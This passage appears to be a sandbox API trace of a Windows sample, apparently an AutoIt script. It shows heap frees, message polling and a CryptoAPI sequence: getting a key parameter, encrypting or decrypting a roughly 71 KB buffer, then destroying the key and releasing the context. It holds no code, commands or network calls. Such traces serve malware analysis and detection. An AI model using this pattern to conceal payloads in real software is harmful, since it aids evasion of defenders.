HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0172.843] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0172.843] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c27d8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27d8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0172.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0172.844] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0172.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0172.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0172.845] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0172.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0172.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0172.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0172.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0172.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0172.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0172.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0172.845] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.845] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.845] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.845] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.845] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.845] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.845] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0172.845] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.845] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.845] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0172.845] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.845] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.845] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0172.845] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.846] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.846] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.846] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.846] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.846] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.846] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.846] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.846] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.847] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.847] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x118f8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x11900) returned 1 [0172.847] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.847] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.847] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.847] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.847] CharLowerBuffW (in: lpsz="byte[71937]", cchLength=0xb | out: lpsz="byte[71937]") returned 0xb [0172.847] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.848] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.848] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.848] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.848] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.849] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9e6a88*, pdwDataLen=0x87e820*=0x118f8, dwBufLen=0x11900 | out: pbData=0x9e6a88*, pdwDataLen=0x87e820*=0x11900) returned 1 [0172.849] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.849] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.849] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.857] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.857] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.857] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.857] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0172.857] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.857] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0172.857] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.857] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.857] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.857] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.857] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0172.857] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.857] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.857] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.862] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.862] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.862] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.867] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.867] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.867] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0172.867] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0172.867] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.867] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0172.867] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.867] CryptDestroyKey (hKey=0x90aed8) returned 1 [0172.868] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0172.868] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0172.868] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0172.868] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0172.868] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0172.868] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0172.868] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0172.868] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0172.868] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.868] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0172.868] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0172.868] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0172.868] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0172.868] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0172.868] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.868] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0172.868] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.868] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0172.869] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.869] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.869] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.869] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.869] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0172.869] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.869] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.869] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0172.869] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0172.869] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0172.869] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.869] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0172.869] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.869] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.869] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0172.869] FreeLibrary (hLibModule=0x74f20000) returned 1 [0172.869] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.869] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.869] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.870] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.872] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, 